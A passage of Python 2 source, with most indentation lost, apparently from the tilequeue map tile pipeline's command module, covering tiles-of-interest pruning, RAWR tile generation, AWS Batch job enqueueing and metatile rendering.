store_parts = prune_cfg.get('s3') or prune_cfg.get('store')
assert store_parts, (
'The configuration of a store containing tiles to delete must be '
'specified under toi-prune:store or toi-prune:s3')
    # explicitly override the store configuration with values provided
# in toi-prune:s3
if legacy_fallback:
cfg.store_type = 's3'
cfg.s3_bucket = store_parts['bucket']
cfg.s3_date_prefix = store_parts['date-prefix']
cfg.s3_path = store_parts['path']
redshift_results = defaultdict(int)
with psycopg2.connect(db_conn_info) as conn:
with conn.cursor() as cur:
cur.execute("""
select x, y, z, tilesize, count(*)
from tile_traffic_v4
where (date >= (current_timestamp - interval '{days} days'))
and (z between 0 and {max_zoom})
and (x between 0 and pow(2,z)-1)
and (y between 0 and pow(2,z)-1)
and (service = 'vector-tiles')
group by z, x, y, tilesize
order by z, x, y, tilesize
""".format(
days=redshift_days_to_query,
max_zoom=redshift_zoom_cutoff
))
for (x, y, z, tile_size, count) in cur:
coord = create_coord(x, y, z)
try:
tile_size_as_zoom = metatile_zoom_from_str(tile_size)
# tile size as zoom > cfg.metatile_zoom would mean that
# someone requested a tile larger than the system is
# currently configured to support (might have been a
# previous configuration).
assert tile_size_as_zoom <= cfg.metatile_zoom
tile_zoom_offset = tile_size_as_zoom - cfg.metatile_zoom
except AssertionError:
# we don't want bogus data to kill the whole process, but
# it's helpful to have a warning. we'll just skip the bad
# row and continue.
logger.warning('Tile size %r is bogus. Should be None, '
'256, 512 or 1024' % (tile_size,))
continue
if tile_zoom_offset:
# if the tile is not the same size as the metatile, then we
# need to offset the zoom to make sure we enqueue the job
# which results in this coordinate being rendered.
coord = coord.zoomBy(tile_zoom_offset).container()
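                        # Illustrative numbers: a 512px row gives
                        # tile_size_as_zoom 1, so with cfg.metatile_zoom == 2
                        # the offset is -1 and zoomBy(-1) moves the coordinate
                        # up one zoom level.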
# just in case we fell off the end of the zoom scale.
if coord.zoom < 0:
continue
# Sum the counts from the 256 and 512 tile requests into the
# slot for the 512 tile.
coord_int = coord_marshall_int(coord)
redshift_results[coord_int] += count
logger.info('Fetching tiles recently requested ... done. %s found',
len(redshift_results))
cutoff_cfg = prune_cfg.get('cutoff', {})
cutoff_requests = cutoff_cfg.get('min-requests', 0)
cutoff_tiles = cutoff_cfg.get('max-tiles', 0)
logger.info('Finding %s tiles requested %s+ times ...',
cutoff_tiles,
cutoff_requests,
)
new_toi = set()
for coord_int, count in sorted(
redshift_results.iteritems(),
key=operator.itemgetter(1),
reverse=True)[:cutoff_tiles]:
if count >= cutoff_requests:
new_toi.add(coord_int)
redshift_results = None
logger.info('Finding %s tiles requested %s+ times ... done. Found %s',
cutoff_tiles,
cutoff_requests,
len(new_toi),
)
for name, info in prune_cfg.get('always-include', {}).items():
logger.info('Adding in tiles from %s ...', name)
immortal_tiles = set()
if 'bbox' in info:
bounds = map(float, info['bbox'].split(','))
for coord in tile_generator_for_single_bounds(
bounds, info['min_zoom'], info['max_zoom']):
coord_int = coord_marshall_int(coord)
immortal_tiles.add(coord_int)
elif 'tiles' in info:
tiles = map(deserialize_coord, info['tiles'])
tiles = map(coord_marshall_int, tiles)
immortal_tiles.update(tiles)
elif 'file' in info:
with open(info['file'], 'r') as f:
immortal_tiles.update(
coord_marshall_int(deserialize_coord(line.strip()))
for line in f
)
elif 'bucket' in info:
from boto import connect_s3
from boto.s3.bucket import Bucket
s3_conn = connect_s3()
bucket = Bucket(s3_conn, info['bucket'])
key = bucket.get_key(info['key'])
raw_coord_data = key.get_contents_as_string()
for line in raw_coord_data.splitlines():
coord = deserialize_coord(line.strip())
if coord:
# NOTE: the tiles in the file should be of the
# same size as the toi
coord_int = coord_marshall_int(coord)
immortal_tiles.add(coord_int)
# Filter out nulls that might sneak in for various reasons
immortal_tiles = filter(None, immortal_tiles)
n_inc = len(immortal_tiles)
new_toi = new_toi.union(immortal_tiles)
# ensure that the new coordinates have valid zooms
new_toi_valid_range = set()
for coord_int in new_toi:
coord = coord_unmarshall_int(coord_int)
if coord_is_valid(coord, cfg.max_zoom):
new_toi_valid_range.add(coord_int)
new_toi = new_toi_valid_range
logger.info('Adding in tiles from %s ... done. %s found', name, n_inc)
logger.info('New tiles of interest set includes %s tiles', len(new_toi))
logger.info('Fetching existing tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching existing tiles of interest ... done. %s found',
n_toi)
logger.info('Computing tiles to remove ...')
toi_to_remove = tiles_of_interest - new_toi
logger.info('Computing tiles to remove ... done. %s found',
len(toi_to_remove))
peripherals.stats.gauge('gardener.removed', len(toi_to_remove))
store = _make_store(cfg)
if not toi_to_remove:
logger.info('Skipping TOI remove step because there are '
'no tiles to remove')
else:
logger.info('Removing %s tiles from TOI and S3 ...',
len(toi_to_remove))
for coord_ints in grouper(toi_to_remove, 1000):
removed = store.delete_tiles(
map(coord_unmarshall_int, coord_ints),
lookup_format_by_extension(
store_parts['format']), store_parts['layer'])
logger.info('Removed %s tiles from S3', removed)
logger.info('Removing %s tiles from TOI and S3 ... done',
len(toi_to_remove))
logger.info('Computing tiles to add ...')
toi_to_add = new_toi - tiles_of_interest
logger.info('Computing tiles to add ... done. %s found',
len(toi_to_add))
peripherals.stats.gauge('gardener.added', len(toi_to_add))
if not toi_to_add:
logger.info('Skipping TOI add step because there are '
'no tiles to add')
else:
logger.info('Enqueueing %s tiles ...', len(toi_to_add))
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(
coord_unmarshall_int(coord_int) for coord_int in toi_to_add
)
logger.info('Enqueueing %s tiles ... done', len(toi_to_add))
if toi_to_add or toi_to_remove:
logger.info('Setting new tiles of interest ... ')
peripherals.toi.set_tiles_of_interest(new_toi)
emit_toi_stats(new_toi, peripherals)
logger.info('Setting new tiles of interest ... done')
else:
logger.info('Tiles of interest did not change, '
'so not setting new tiles of interest')
logger.info('Pruning tiles of interest ... done')
time_overall.stop()
def tilequeue_process_wof_neighbourhoods(cfg, peripherals):
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.wof import make_wof_model
from tilequeue.wof import make_wof_url_neighbourhood_fetcher
from tilequeue.wof import make_wof_processor
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
wof_cfg = cfg.wof
assert wof_cfg, 'Missing wof config'
logger = make_logger(cfg, 'wof_process_neighbourhoods')
logger.info('WOF process neighbourhoods run started')
n_raw_neighbourhood_fetch_threads = 5
fetcher = make_wof_url_neighbourhood_fetcher(
wof_cfg['neighbourhoods-meta-url'],
wof_cfg['microhoods-meta-url'],
wof_cfg['macrohoods-meta-url'],
wof_cfg['boroughs-meta-url'],
wof_cfg['data-prefix-url'],
n_raw_neighbourhood_fetch_threads,
wof_cfg.get('max-retries', 0)
)
model = make_wof_model(wof_cfg['postgresql'])
current_date = datetime.date.today()
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller)
processor = make_wof_processor(
fetcher, model, peripherals.toi, rawr_enqueuer, logger, current_date)
logger.info('Processing ...')
processor()
logger.info('Processing ... done')
logger.info('WOF process neighbourhoods run completed')
def tilequeue_initial_load_wof_neighbourhoods(cfg, peripherals):
from tilequeue.wof import make_wof_initial_loader
from tilequeue.wof import make_wof_model
from tilequeue.wof import make_wof_filesystem_neighbourhood_fetcher
wof_cfg = cfg.wof
assert wof_cfg, 'Missing wof config'
logger = make_logger(cfg, 'wof_process_neighbourhoods')
logger.info('WOF initial neighbourhoods load run started')
n_raw_neighbourhood_fetch_threads = 50
fetcher = make_wof_filesystem_neighbourhood_fetcher(
wof_cfg['data-path'],
n_raw_neighbourhood_fetch_threads,
)
model = make_wof_model(wof_cfg['postgresql'])
loader = make_wof_initial_loader(fetcher, model, logger)
logger.info('Loading ...')
loader()
logger.info('Loading ... done')
def tilequeue_dump_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'dump_tiles_of_interest')
logger.info('Dumping tiles of interest')
logger.info('Fetching tiles of interest ...')
toi_set = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(toi_set)
logger.info('Fetching tiles of interest ... done')
toi_filename = "toi.txt"
logger.info('Writing %d tiles of interest to %s ...', n_toi, toi_filename)
with open(toi_filename, "w") as f:
save_set_to_fp(toi_set, f)
logger.info(
'Writing %d tiles of interest to %s ... done',
n_toi,
toi_filename
)
def tilequeue_load_tiles_of_interest(cfg, peripherals):
"""
Given a newline-delimited file containing tile coordinates in
`zoom/column/row` format, load those tiles into the tiles of interest.
"""
logger = make_logger(cfg, 'load_tiles_of_interest')
toi_filename = "toi.txt"
logger.info('Loading tiles of interest from %s ... ', toi_filename)
with open(toi_filename, 'r') as f:
new_toi = load_set_from_fp(f)
logger.info('Loading tiles of interest from %s ... done', toi_filename)
logger.info('Setting new TOI (with %s tiles) ... ', len(new_toi))
peripherals.toi.set_tiles_of_interest(new_toi)
emit_toi_stats(new_toi, peripherals)
logger.info('Setting new TOI (with %s tiles) ... done', len(new_toi))
logger.info('Loading tiles of interest ... done')
def tilequeue_stuck_tiles(cfg, peripherals):
"""
Check which files exist on s3 but are not in toi.
"""
store = _make_store(cfg)
format = lookup_format_by_extension('zip')
layer = 'all'
assert peripherals.toi, 'Missing toi'
toi = peripherals.toi.fetch_tiles_of_interest()
for coord in store.list_tiles(format, layer):
coord_int = coord_marshall_int(coord)
if coord_int not in toi:
print serialize_coord(coord)
def tilequeue_delete_stuck_tiles(cfg, peripherals):
logger = make_logger(cfg, 'delete_stuck_tiles')
format = lookup_format_by_extension('zip')
layer = 'all'
store = _make_store(cfg)
logger.info('Removing tiles from S3 ...')
total_removed = 0
for coord_strs in grouper(sys.stdin, 1000):
coords = []
for coord_str in coord_strs:
coord = deserialize_coord(coord_str)
if coord:
coords.append(coord)
if coords:
n_removed = store.delete_tiles(coords, format, layer)
total_removed += n_removed
logger.info('Removed %s tiles from S3', n_removed)
logger.info('Total removed: %d', total_removed)
logger.info('Removing tiles from S3 ... DONE')
def tilequeue_tile_status(cfg, peripherals, args):
"""
Report the status of the given tiles in the store, queue and TOI.
"""
logger = make_logger(cfg, 'tile_status')
# friendly warning to avoid confusion when this command outputs nothing
# at all when called with no positional arguments.
if not args.coords:
logger.warning('No coordinates given on the command line.')
return
# pre-load TOI to avoid having to do it for each coordinate
toi = None
if peripherals.toi:
toi = peripherals.toi.fetch_tiles_of_interest()
# TODO: make these configurable!
tile_format = lookup_format_by_extension('zip')
store = _make_store(cfg)
for coord_str in args.coords:
coord = deserialize_coord(coord_str)
# input checking! make sure that the coordinate is okay to use in
# the rest of the code.
if not coord:
logger.warning('Could not deserialize %r as coordinate', coord_str)
continue
if not coord_is_valid(coord):
logger.warning('Coordinate is not valid: %r (parsed from %r)',
coord, coord_str)
continue
# now we think we probably have a valid coordinate. go look up
# whether it exists in various places.
logger.info("=== %s ===", coord_str)
coord_int = coord_marshall_int(coord)
if peripherals.inflight_mgr:
is_inflight = peripherals.inflight_mgr.is_inflight(coord)
logger.info('inflight: %r', is_inflight)
if toi:
in_toi = coord_int in toi
            logger.info('in TOI: %r', in_toi)
data = store.read_tile(coord, tile_format)
logger.info('tile in store: %r', bool(data))
class TileArgumentParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
class FakeStatsd(object):
def __init__(self, *args, **kwargs):
pass
def incr(self, *args, **kwargs):
pass
def decr(self, *args, **kwargs):
pass
def gauge(self, *args, **kwargs):
pass
def set(self, *args, **kwargs):
pass
def timing(self, *args, **kwargs):
pass
def timer(self, *args, **kwargs):
return FakeStatsTimer()
def pipeline(self):
return self
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class FakeStatsTimer(object):
def __init__(self, *args, **kwargs):
pass
def start(self):
pass
def stop(self):
pass
def tilequeue_process_tile(cfg, peripherals, args):
if not args.coord:
print >> sys.stderr, 'Missing coord argument'
sys.exit(1)
coord_str = args.coord
coord = deserialize_coord(coord_str)
if not coord:
print >> sys.stderr, 'Invalid coordinate: %s' % coord_str
sys.exit(2)
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
formats = lookup_formats(cfg.output_formats)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
for fetch, _ in data_fetcher.fetch_tiles([dict(coord=coord)]):
formatted_tiles, extra_data = process(
coord, cfg.metatile_zoom, fetch, layer_data, post_process_data,
formats, cfg.buffer_cfg, output_calc_mapping, cfg.max_zoom,
cfg.tile_sizes)
# can think about making this configurable
# but this is intended for debugging anyway
json_tile = [x for x in formatted_tiles
if x['format'].extension == 'json']
assert json_tile
json_tile = json_tile[0]
tile_data = json_tile['tile']
print tile_data
def tilequeue_rawr_enqueue(cfg, args):
"""command to take tile expiry path and enqueue for rawr tile generation"""
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
logger = make_logger(cfg, 'rawr_enqueue')
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, msg_marshaller)
with open(args.expiry_path) as fh:
coords = create_coords_generator_from_tiles_file(fh)
rawr_enqueuer(coords)
def _tilequeue_rawr_setup(cfg,
s3_role_arn=None,
s3_role_session_duration_s=None):
"""command to read from rawr queue and generate rawr tiles
if `s3_role_arn` is non-empty then it will be used as the IAM role
to access the S3 and `s3_role_session_duration_s` determines the S3
session duration in seconds
"""
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
rawr_postgresql_yaml = rawr_yaml.get('postgresql')
assert rawr_postgresql_yaml, 'Missing rawr postgresql config'
from raw_tiles.formatter.msgpack import Msgpack
from raw_tiles.gen import RawrGenerator
from raw_tiles.source.conn import ConnectionContextManager
from raw_tiles.source import parse_sources
from raw_tiles.source import DEFAULT_SOURCES as DEFAULT_RAWR_SOURCES
from tilequeue.rawr import RawrS3Sink
from tilequeue.rawr import RawrStoreSink
import boto3
# pass through the postgresql yaml config directly
conn_ctx = ConnectionContextManager(rawr_postgresql_yaml)
rawr_source_list = rawr_yaml.get('sources', DEFAULT_RAWR_SOURCES)
assert isinstance(rawr_source_list, list), \
'RAWR source list should be a list'
assert len(rawr_source_list) > 0, \
'RAWR source list should be non-empty'
rawr_store = rawr_yaml.get('store')
if rawr_store:
store = \
make_store(rawr_store,
s3_role_arn=s3_role_arn,
s3_role_session_duration_s=s3_role_session_duration_s)
rawr_sink = RawrStoreSink(store)
else:
rawr_sink_yaml = rawr_yaml.get('sink')
assert rawr_sink_yaml, 'Missing rawr sink config'
sink_type = rawr_sink_yaml.get('type')
assert sink_type, 'Missing rawr sink type'
if sink_type == 's3':
s3_cfg = rawr_sink_yaml.get('s3')
assert s3_cfg, 'Missing s3 config'
bucket = s3_cfg.get('bucket')
assert bucket, 'Missing rawr sink bucket'
sink_region = s3_cfg.get('region')
assert sink_region, 'Missing rawr sink region'
prefix = s3_cfg.get('prefix')
assert prefix, 'Missing rawr sink prefix'
extension = s3_cfg.get('extension')
assert extension, 'Missing rawr sink extension'
tags = s3_cfg.get('tags')
from tilequeue.store import make_s3_tile_key_generator
tile_key_gen = make_s3_tile_key_generator(s3_cfg)
if s3_role_arn:
# use provided role to access S3
assert s3_role_session_duration_s, \
's3_role_session_duration_s is either None or 0'
aws_helper = AwsSessionHelper('tilequeue_dataaccess',
s3_role_arn,
sink_region,
s3_role_session_duration_s)
s3_client = aws_helper.get_client('s3')
else:
s3_client = boto3.client('s3', region_name=sink_region)
rawr_sink = RawrS3Sink(
s3_client, bucket, prefix, extension, tile_key_gen, tags)
elif sink_type == 'none':
from tilequeue.rawr import RawrNullSink
rawr_sink = RawrNullSink()
else:
assert 0, 'Unknown rawr sink type %s' % sink_type
rawr_source = parse_sources(rawr_source_list)
rawr_formatter = Msgpack()
rawr_gen = RawrGenerator(rawr_source, rawr_formatter, rawr_sink)
return rawr_gen, conn_ctx
# run RAWR tile processing in a loop, reading from queue
def tilequeue_rawr_process(cfg, peripherals):
from tilequeue.rawr import RawrTileGenerationPipeline
from tilequeue.log import JsonRawrProcessingLogger
from tilequeue.stats import RawrTilePipelineStatsHandler
from tilequeue.rawr import make_rawr_queue_from_yaml
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
rawr_queue_yaml = rawr_yaml.get('queue')
assert rawr_queue_yaml, 'Missing rawr queue config'
rawr_queue = make_rawr_queue_from_yaml(rawr_queue_yaml, msg_marshaller)
logger = make_logger(cfg, 'rawr_process')
stats_handler = RawrTilePipelineStatsHandler(peripherals.stats)
rawr_proc_logger = JsonRawrProcessingLogger(logger)
rawr_gen, conn_ctx = _tilequeue_rawr_setup(cfg)
rawr_pipeline = RawrTileGenerationPipeline(
rawr_queue, msg_marshaller, group_by_zoom, rawr_gen,
peripherals.queue_writer, stats_handler,
rawr_proc_logger, conn_ctx)
rawr_pipeline()
def make_default_run_id(include_clock_time, now=None):
if now is None:
now = datetime.datetime.now()
if include_clock_time:
fmt = '%Y%m%d-%H:%M:%S'
else:
fmt = '%Y%m%d'
return now.strftime(fmt)
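# Illustrative examples (using a fixed datetime for clarity):
#   make_default_run_id(True,  datetime.datetime(2021, 4, 26, 13, 5, 9))
#       -> '20210426-13:05:09'
#   make_default_run_id(False, datetime.datetime(2021, 4, 26, 13, 5, 9))
#       -> '20210426'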
# run a single RAWR tile generation
def tilequeue_rawr_tile(cfg, args):
from raw_tiles.source.table_reader import TableReader
from tilequeue.log import JsonRawrTileLogger
from tilequeue.rawr import convert_coord_object
parent_coord_str = args.tile
parent = deserialize_coord(parent_coord_str)
assert parent, 'Invalid tile coordinate: %s' % parent_coord_str
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
    rawr_gen, conn_ctx = _tilequeue_rawr_setup(
        cfg,
        s3_role_arn=args.s3_role_arn,
        s3_role_session_duration_s=args.s3_role_session_duration_s)
logger = make_logger(cfg, 'rawr_tile')
rawr_tile_logger = JsonRawrTileLogger(logger, run_id)
rawr_tile_logger.lifecycle(parent, 'Rawr tile generation started')
parent_timing = {}
with time_block(parent_timing, 'total'):
job_coords = find_job_coords_for(parent, group_by_zoom)
for coord in job_coords:
try:
coord_timing = {}
with time_block(coord_timing, 'total'):
rawr_tile_coord = convert_coord_object(coord)
with conn_ctx() as conn:
# commit transaction
with conn as conn:
# cleanup cursor resources
with conn.cursor() as cur:
table_reader = TableReader(cur)
rawr_gen_timing = rawr_gen(
table_reader, rawr_tile_coord)
coord_timing['gen'] = rawr_gen_timing
rawr_tile_logger.coord_done(parent, coord, coord_timing)
except Exception as e:
rawr_tile_logger.error(e, parent, coord)
rawr_tile_logger.parent_coord_done(parent, parent_timing)
rawr_tile_logger.lifecycle(parent, 'Rawr tile generation finished')
def _tilequeue_rawr_seed(cfg, peripherals, coords):
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
from tilequeue.rawr import RawrAllIntersector
from tilequeue.stats import RawrTileEnqueueStatsHandler
logger = make_logger(cfg, 'rawr_seed')
stats_handler = RawrTileEnqueueStatsHandler(peripherals.stats)
rawr_toi_intersector = RawrAllIntersector()
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller,
rawr_toi_intersector)
rawr_enqueuer(coords)
logger.info('%d coords enqueued', len(coords))
def tilequeue_rawr_seed_toi(cfg, peripherals):
"""command to read the toi and enqueue the corresponding rawr tiles"""
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
coords = map(coord_unmarshall_int, tiles_of_interest)
_tilequeue_rawr_seed(cfg, peripherals, coords)
def tilequeue_rawr_seed_all(cfg, peripherals):
"""command to enqueue all the tiles at the group-by zoom"""
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
max_coord = 2 ** group_by_zoom
# creating the list of all coordinates here might be a lot of memory, but
# if we handle the TOI okay then we should be okay with z10. if the group
# by zoom is much larger, then it might start running into problems.
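    # e.g. at group-zoom 10 this is 2**10 * 2**10 = 1,048,576 coordinates;
    # at group-zoom 11 it would already be ~4.2 million.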
coords = []
for x in xrange(0, max_coord):
for y in xrange(0, max_coord):
coords.append(Coordinate(zoom=group_by_zoom, column=x, row=y))
_tilequeue_rawr_seed(cfg, peripherals, coords)
Peripherals = namedtuple(
'Peripherals',
'toi stats redis_client '
'queue_mapper msg_marshaller inflight_mgr queue_writer'
)
def make_statsd_client_from_cfg(cfg):
if cfg.statsd_host:
import statsd
stats = statsd.StatsClient(cfg.statsd_host, cfg.statsd_port,
prefix=cfg.statsd_prefix)
else:
stats = FakeStatsd()
return stats
def tilequeue_batch_enqueue(cfg, args):
logger = make_logger(cfg, 'batch_enqueue')
import boto3
region_name = os.environ.get('AWS_DEFAULT_REGION', 'us-east-1')
client = boto3.client('batch', region_name=region_name)
logger.info('Batch enqueue ...')
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
job_def = batch_yaml.get('job-definition')
assert job_def, 'Missing batch job-definition config'
job_queue = batch_yaml.get('job-queue')
assert job_queue, 'Missing batch job-queue config'
job_name_prefix = batch_yaml.get('job-name-prefix')
assert job_name_prefix, 'Missing batch job-name-prefix config'
check_metatile_exists = batch_yaml.get('check-metatile-exists')
retry_attempts = batch_yaml.get('retry-attempts')
memory = batch_yaml.get('memory')
vcpus = batch_yaml.get('vcpus')
run_id = batch_yaml.get('run_id')
if not run_id:
run_id = make_default_run_id(include_clock_time=True)
if args.file:
with open(args.file) as coords_fh:
coords = list(create_coords_generator_from_tiles_file(coords_fh))
elif args.tile:
coord = deserialize_coord(args.tile)
assert coord, 'Invalid coord: %s' % args.tile
coords = [coord]
elif args.pyramid:
coords = tile_generator_for_range(0, 0, 0, 0, 0, 7)
else:
dim = 2 ** queue_zoom
coords = tile_generator_for_range(
0, 0, dim-1, dim-1, queue_zoom, queue_zoom)
for i, coord in enumerate(coords):
coord_str = serialize_coord(coord)
job_name = '%s-%d-%d-%d' % (
job_name_prefix, coord.zoom, coord.column, coord.row)
job_parameters = dict(
tile=coord_str,
run_id=run_id,
)
job_opts = dict(
jobDefinition=job_def,
jobQueue=job_queue,
jobName=job_name,
parameters=job_parameters,
)
if retry_attempts is not None:
job_opts['retryStrategy'] = dict(attempts=retry_attempts)
        container_overrides = {}
        if check_metatile_exists is not None:
            val_str = str(bool(check_metatile_exists))
            # AWS Batch expects `environment` to be a list of name/value dicts
            container_overrides['environment'] = [
                dict(name='TILEQUEUE__BATCH__CHECK-METATILE-EXISTS',
                     value=val_str),
            ]
if memory:
container_overrides['memory'] = memory
if vcpus:
container_overrides['vcpus'] = vcpus
if container_overrides:
job_opts['containerOverrides'] = container_overrides
resp = client.submit_job(**job_opts)
        assert resp['ResponseMetadata']['HTTPStatusCode'] == 200, \
            'Failed to submit job: %s' % job_name
i += 1
if i % 1000 == 0:
logger.info('%d jobs submitted', i)
logger.info('Batch enqueue ... done - %d coords enqueued', i)
def find_job_coords_for(coord, target_zoom):
assert target_zoom >= coord.zoom
if coord.zoom == target_zoom:
yield coord
return
xmin = coord.column
xmax = coord.column
ymin = coord.row
ymax = coord.row
for i in xrange(target_zoom - coord.zoom):
xmin *= 2
ymin *= 2
xmax = xmax * 2 + 1
ymax = ymax * 2 + 1
for y in xrange(ymin, ymax+1):
for x in xrange(xmin, xmax+1):
            yield Coordinate(zoom=target_zoom, column=x, row=y)
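# Illustrative example: a parent tile at z7 expanded to group-zoom 10 yields
# an 8x8 block of 64 job coordinates, e.g.
#   list(find_job_coords_for(Coordinate(zoom=7, column=1, row=2), 10))
# covers columns 8..15 and rows 16..23 at zoom 10.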
def tilequeue_meta_tile(cfg, args):
from tilequeue.log import JsonMetaTileLogger
from tilequeue.metatile import make_metatiles
coord_str = args.tile
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
logger = make_logger(cfg, 'meta_tile')
meta_tile_logger = JsonMetaTileLogger(logger, run_id)
store = \
_make_store(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.s3_role_session_duration_s,
logger=logger)
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
parent = deserialize_coord(coord_str)
assert parent, 'Invalid coordinate: %s' % coord_str
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg,
layer_data,
query_cfg,
io_pool,
args.s3_role_arn,
args.s3_role_session_duration_s)
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
assert queue_zoom <= parent.zoom <= group_by_zoom, \
'Unexpected zoom: %s, zoom should be between %d and %d' % \
(coord_str, queue_zoom, group_by_zoom)
# NOTE: max_zoom looks to be inclusive
zoom_stop = cfg.max_zoom
assert zoom_stop > group_by_zoom
formats = lookup_formats(cfg.output_formats)
meta_tile_logger.begin_run(parent)
zip_format = lookup_format_by_extension('zip')
assert zip_format
job_coords = find_job_coords_for(parent, group_by_zoom)
for job_coord in job_coords:
meta_tile_logger.begin_pyramid(parent, job_coord)
# each coord here is the unit of work now
pyramid_coords = [job_coord]
pyramid_coords.extend(coord_children_range(job_coord, zoom_stop))
coord_data = [dict(coord=x) for x in pyramid_coords]
try:
fetched_coord_data = list(data_fetcher.fetch_tiles(coord_data))
except Exception as e:
meta_tile_logger.pyramid_fetch_failed(e, parent, job_coord)
continue
for fetch, coord_datum in fetched_coord_data:
coord_start_ms = int(time.time() * 1000)
coord = coord_datum['coord']
if check_metatile_exists:
existing_data = store.read_tile(coord, zip_format)
if existing_data is not None:
meta_tile_logger.metatile_already_exists(
parent, job_coord, coord)
continue
def log_fn(data):
meta_tile_logger._log(
data, parent, pyramid=job_coord, coord=coord)
processor = Processor(
coord, cfg.metatile_zoom, fetch, layer_data,
post_process_data, formats, cfg.buffer_cfg,
output_calc_mapping, cfg.max_zoom, cfg.tile_sizes,
log_fn=log_fn)
try:
processor.fetch()
except Exception as e:
meta_tile_logger.tile_fetch_failed(
e, parent, job_coord, coord)
continue
try:
formatted_tiles, _ = processor.process_tiles()
except Exception as e:
meta_tile_logger.tile_process_failed(
e, parent, job_coord, coord)
continue
try:
tiles = make_metatiles(cfg.metatile_size, formatted_tiles)
for tile in tiles:
store.write_tile(
tile['tile'], tile['coord'], tile['format'])
except Exception as e:
meta_tile_logger.metatile_storage_failed(
e, parent, job_coord, coord)
continue
meta_tile_logger.tile_processed(parent, job_coord,
coord, coord_start_ms)
meta_tile_logger.end_pyramid(parent, job_coord)
meta_tile_logger.end_run(parent)
def tilequeue_meta_tile_low_zoom(cfg, args):
from tilequeue.log import JsonMetaTileLowZoomLogger
from tilequeue.metatile import make_metatiles
coord_str = args.tile
parent = deserialize_coord(coord_str)
assert parent, 'Invalid tile coordinate: %s' % coord_str
run_id = args.run_id
if not run_id:
run_id = make_default_run_id(include_clock_time=False)
logger = make_logger(cfg, 'meta_tile_low_zoom')
meta_low_zoom_logger = JsonMetaTileLowZoomLogger(logger, run_id)
store = _make_store(cfg,
s3_role_arn=args.s3_role_arn,
s3_role_session_duration_s=args.s3_role_session_duration_s, # noqa
logger=logger)
batch_yaml = cfg.yml.get('batch')
assert batch_yaml, 'Missing batch config'
    # NOTE: the queue zoom is the zoom at which a job also implies that its
    # children should be processed; at lower zooms we only generate a meta
    # tile for the individual coordinate
queue_zoom = batch_yaml.get('queue-zoom')
assert queue_zoom, 'Missing batch queue-zoom config'
assert 0 <= parent.zoom <= queue_zoom
check_metatile_exists = bool(batch_yaml.get('check-metatile-exists'))
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
io_pool = ThreadPool(len(layer_data))
